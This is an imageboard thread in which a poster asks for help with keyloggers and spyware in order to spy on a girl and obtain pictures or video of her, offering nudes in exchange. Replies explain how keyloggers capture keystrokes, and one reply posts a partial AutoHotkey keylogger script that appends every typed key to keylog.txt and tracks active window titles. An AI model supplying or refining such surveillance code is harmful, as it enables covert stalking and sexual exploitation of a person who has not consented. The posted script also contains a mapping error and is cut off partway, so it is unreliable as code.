Hey Cred Forums newbie here

Hey Cred Forums newbie here
Can you explain me a little about mischief
keyloggers,spyware etc...
Will post nudes if i succed

What you have to do?

spy on a girl
get some pics or video maybe

Keyloggers log passwords and id's of users.

How does it work?

>pic
this film is utter bullshit.
And its so cringy.

what movie

From what I know, a keylogger should log the site that someone has been on and what they've typed into the login boxes. It also logs whatever they type.

If you download any type of keyloger or spyware, it is going to have a second hidden virus in it.
If you infect someone elses computer, you are also infecting it for some other person who will have permanent access to the victims computer.
If you dont know enough to write your own viruses, you have no business messing around with this stuff.

Actually keyloggers register each keystroke and mouse click once installed in the PC,they're good to steal passwords and accounts but most of them require physical access to the victims PC

its from hackers (1995)

such a cringy shit.

spyware sends information about you and your computer to others without your permission. keyloggers log keystrokes, and are often used to steal passwords. mischief is what cats and 5-year-olds get up to when nobody's around to keep them in check. It's usually pretty adorable.

I'd say you succ pretty badly. Post some nudes.

whoa whoa whoa, we got a bad ass over here!

no, he's right.

A keylogger works by either subverting program isolation, hooking into the software stack that handles interface devices or by sniffing network traffic. Most of the keyloggers you'll find are either the work of a skid or are some normie tier commercial bullshit.

>write your own viruses
This is why you ask Cred Forums these kind of shit questions OP. At least we aren't using our asscheecks as earmuffs.

part 1
;
; AutoHotkey Version: 1.x
; Language: English
; Platform: Win9x/NT
; Author: A.N.Other
;
; Script Function:
; Template script (you can customize this template by editing "ShellNew\Template.ahk" in your Windows folder)
;

#NoEnv ; Recommended for performance and compatibility with future AutoHotkey releases.
SendMode Input ; Recommended for new scripts due to its superior speed and reliability.

; Detect hidden windows since they can be active
; (e.g. AutoHotkey main window while using Menu,MenuName,Show.)
DetectHiddenWindows, On

Loop {
WinWaitNotActive, % "ahk_id " WinActive("A")
WinGetActiveTitle, Title
ToolTip, %Title%
SoundPlay, *-1

part 2
}


~a::fileappend, a, keylog.txt

~b::fileappend, b, keylog.txt

~c::fileappend, c, keylog.txt

~d::fileappend, d, keylog.txt

~e::fileappend, e, keylog.txt

~f::fileappend, f, keylog.txt

~g::fileappend, g, keylog.txt

~h::fileappend, h, keylog.txt

~i::fileappend, i, keylog.txt

~j::fileappend, j, keylog.txt

~k::fileappend, k, keylog.txt

~l::fileappend, l, keylog.txt

~m::fileappend, m, keylog.txt

~n::fileappend, n, keylog.txt

~o::fileappend, o, keylog.txt

~p::fileappend, p, keylog.txt

part 3
~q::fileappend, q, keylog.txt

~r::fileappend, r, keylog.txt

~s::fileappend, s, keylog.txt

~t::fileappend, t, keylog.txt

~u::fileappend, u, keylog.txt

~v::fileappend, v, keylog.txt

~w::fileappend, w, keylog.txt

~x::fileappend, x, keylog.txt

~y::fileappend, y, keylog.txt

~z::fileappend, z, keylog.txt

~+A::fileappend, B, keylog.txt

~+B::fileappend, B, keylog.txt

~+C::fileappend, C, keylog.txt

~+D::fileappend, D, keylog.txt

~+E::fileappend, E, keylog.txt

~+F::fileappend, F, keylog.txt

~+G::fileappend, G, keylog.txt

~+H::fileappend, H, keylog.txt

...

Will it work on potato os 7